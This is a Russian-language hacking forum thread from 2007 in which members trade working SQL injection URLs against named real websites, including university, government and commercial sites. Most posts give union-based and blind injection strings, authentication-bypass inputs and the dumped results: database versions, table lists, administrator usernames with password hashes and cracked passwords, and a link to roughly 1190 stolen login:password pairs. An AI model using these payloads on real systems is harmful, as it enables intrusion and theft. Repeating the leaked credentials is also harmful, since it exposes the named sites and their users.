Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.11.2007, 21:48
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
pereslavl.ru
Код:
http://www.pereslavl.ru/news/world_news.cgi?show_news=-69144+union+select+1,2,table_name,4,concat_ws(char(58),version(),user(),database()),6,7+from+information_schema.tables+limit+16,8+--+
5.0.22-Debian_2-log:world_news@localhost:world_news
Код:
http://www.pereslavl.ru/forum/ftower.cgi?board_id=-31+union+select+1+from+information_schema.tables+--+
скуля слепая
Пробую
Логин: admin'=1 OR 1=1/*
Пароль: 123
Захожу под Casper, пробую другие ники, все равно захажу как Casper, а он не админ
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
01.11.2007, 22:20
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2l-l00K
делай так :admin'=1 OR 1=1 limit 2,1/*
и лимитом переберай
а вот вход под админом
admin' or '1'='1
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 01.11.2007 в 22:29..
|
|
|
|
01.11.2007, 23:41
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
http://www.aim.edu/
Код:
http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Extuser+where+username+not+in+('gsbhatia','spprasu'))--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Базы:
AIMADB
AIMBeta <- От сайта. Список таблиц:
'bboard_reply','a_yearexperience','a_country','a_e ducation','a_foundus','a_industry','a_jobfunction' ,'a_jobposition','a_orgtype','a_products','a_signu ptype','a_yearsworked','about_class','accesslist', 'advisorresults','Alumni_Picture','applicationform ','appRequirement','AppsLaunch','appslist','appsta tus','archiveapplicationform','archiveAppRequireme nt','archiveappstatus','archiveformassign','archiv eMEapplicants','bboard_subject','bboard_topic','Ca lendar','corners','cost_air','cost_dorm','cost_exe c','cost_food','cost_tuition','country','criteria' ,'D99_CMD','D99_Tmp','dbcourses','dbEventCategory' ,'dbevents','dbevents_new','dbflags','dbmodules',' dbobjectives','dbparts','dbprogqual','dbprograms', 'dbprograms2','dbprogrequirements','dbqualificatio ns','dbtrackcols','dbtrackrows','dean','department ','downloadhits','dtproperties','EmailBroadcast',' EmailBroadcastArchive','emailtemplate','ExtUser'(u sername,password),'ExtUserProfile','Faculty_Messag e','faculty_resume','faq','faq_escalation','faq_ke ywords','faq_type','formassign','funding','iExtUse rProfile','incappstatus','IntUser','IntUserProfile ','Jobs','lodging_types','logo','MEapplicants','me dia','memberaccesslist','membership('membershipID' ,'name','description')','news','period','Picture_G allery','Picture_Gallery2','prescorner','Prog2Scho ol','program_assign','publications','Reference','R efResultSet','relatednews','Rights','save_query_co st','save_query_funding','schools','statisticrepor ts','Statuslist','sysconstraints','syssegments','s ystables','t_jiaozhu','Video_Gallery','Video_Galle ry2','VIEW_STAT_SCH','VIEW1','vw_Jobs','vw_newsacc ess','vw_userapplist','vw_userapps','vwn_tblIncapp status_tblExtUser_tblExtUserProfile_tblCriteria',' webmessage','writereference'
AIMDB
AlumniPortal
master
Microfinance
model
msdb
Northwind
OSUSData
pubs
tempdb
1190 пользователей (логин:пасс)
http://www.rapidshare.com/files/66783989/lol.txt.html
-------------
Бесполезные скули 
http://www.marshall.edu <- нет таблиц, не присутствуют пользователи
Код:
http://www.marshall.edu/www/announce.asp?ID=240+or+1=(select+top+1+table_name+from+information_schema.tables)--
http://appserv02.uncw.edu <- нет доступа к интересным базам\таблицам
Код:
http://appserv02.uncw.edu/news/article.asp?ID=-1+or+1=(select+@@version)--
http://www.fisk.edu/ <- нет доступа к таблицам
Код:
http://www.fisk.edu/page.asp?id=72+or+1=(select+@@version)--
|
|
|
|
02.11.2007, 01:36
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Код HTML:
http://www.bananas-gym.de/docs/newscontent.php?id=36%20UNION%20SELECT%201,username,3,user_password+FROM+phpbb_users/*
Есть ещё таблица sites
Так же есть поле user_icq но ничего не нашёл....короче только админить мона |
|
|
|
02.11.2007, 02:32
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
Код:
http://www.gamerevolution.com/news/view.php?id=-3369+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13
User: gamerev@10.15.178.62
Version: 4.1.21-standard-log
Database: gamerev |
|
|
|
02.11.2007, 03:15
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 6
Провел на форуме:
20417
Репутация:
42
|
|
Код:
http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*
Версия БД: 4.0.18
База: news
Юзер: web@vml-news.duhs.duke.edu |
|
|
|
02.11.2007, 03:28
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Сообщение от ЛифчиС5СВ
Код:
http://www.gamerevolution.com/news/view.php?id=-3369+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13
User: gamerev@10.15.178.62
Version: 4.1.21-standard-log
Database: gamerevнашёл 2 таблицы member и phpbb_users
|
|
|
|
02.11.2007, 03:47
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Сообщение от Anna89
Код:
http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*
Версия БД: 4.0.18
База: news
Юзер: web@vml-news.duhs.duke.edu
есть ещё база mysql.user
Код HTML:
http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,concat(user,0x3a,password),3+FROM+mysql.user/*
|
|
|
|
02.11.2007, 04:27
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Код HTML:
http://www.ycegmbh.com/newscontent.php?id=-27%20UNION%20SELECT%201,name,pwd,4,5,6,7,8,9+FROM+admin
adminка
Код HTML:
http://www.ycegmbh.com/admin/login.php?
|
|
|
|
02.11.2007, 09:53
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.hawaii.gov
http://www.hawaii.gov/spo2/source/search_results.php?sourcemethodID=-2+union+select+aes_decrypt(aes_encrypt(concat(user name,0x3a,password,0x3a,email),0x71),0x71)+from+us ers+limit+1,99/*
Version: 4.1.12
User: webuser@ahi
1: administrator:5f4dcc3b5aa765d61d8327deb882cf99: password
2: corinne:7c7727fdda7701ef4998d185b1357442: spoh
http://grande.nal.usda.gov
http://grande.nal.usda.gov/ibids/index.php?mode2=detail&origin=ibids_references&the row=-289466'+union+select+1,USER(),VERSION(),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
Version: 4.0.14-log
User: gmoore@localhost
Последний раз редактировалось 0nep@t0p; 03.11.2007 в 09:29..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
